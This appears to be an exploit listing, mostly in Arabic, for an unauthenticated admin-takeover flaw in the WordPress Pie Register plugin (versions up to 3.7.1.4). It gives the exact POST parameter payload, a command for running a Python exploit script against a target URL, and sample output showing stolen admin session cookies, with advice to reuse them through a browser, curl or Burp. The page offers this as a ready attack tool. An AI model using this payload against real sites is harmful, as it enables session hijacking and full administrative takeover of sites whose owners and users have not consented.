
WordPress Pie Register ≤ 3.7.1.4 - تصعيد صلاحيات المدير (بدون مصادقة)
Mrj Haxcore
توفّر إضافة Pie Register الخاصة بـ WordPress (الإصدار ≤ 3.7.1.4) نقطة نهاية غير مصادق عليها تسمح للمهاجم بـ اختطاف جلسات المسؤول بمجرد إرسال حمولة محددة عبر POST.
يؤدي استغلال هذه الثغرة إلى سرقة ملفات تعريف ارتباط الجلسة الخاصة بالمستخدم ذي المعرّف 1 (عادةً admin) دون الحاجة إلى أي بيانات اعتماد لتسجيل الدخول.
pie-registeruser_id_social_site=1
عند إرسال هذا المعامل إلى المسار الجذر (/)، يؤدي إلى قيام الإضافة بمصادقة المهاجم بصفته المستخدم ذا المعرّف 1 (عادةً admin)، وإصدار ملفات تعريف ارتباط جلسة صالحة.
requests, beautifulsoup4 (اختياري، لتحليل ملفات تعريف الارتباط)python3 pie.py http://target.site
---
Output
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.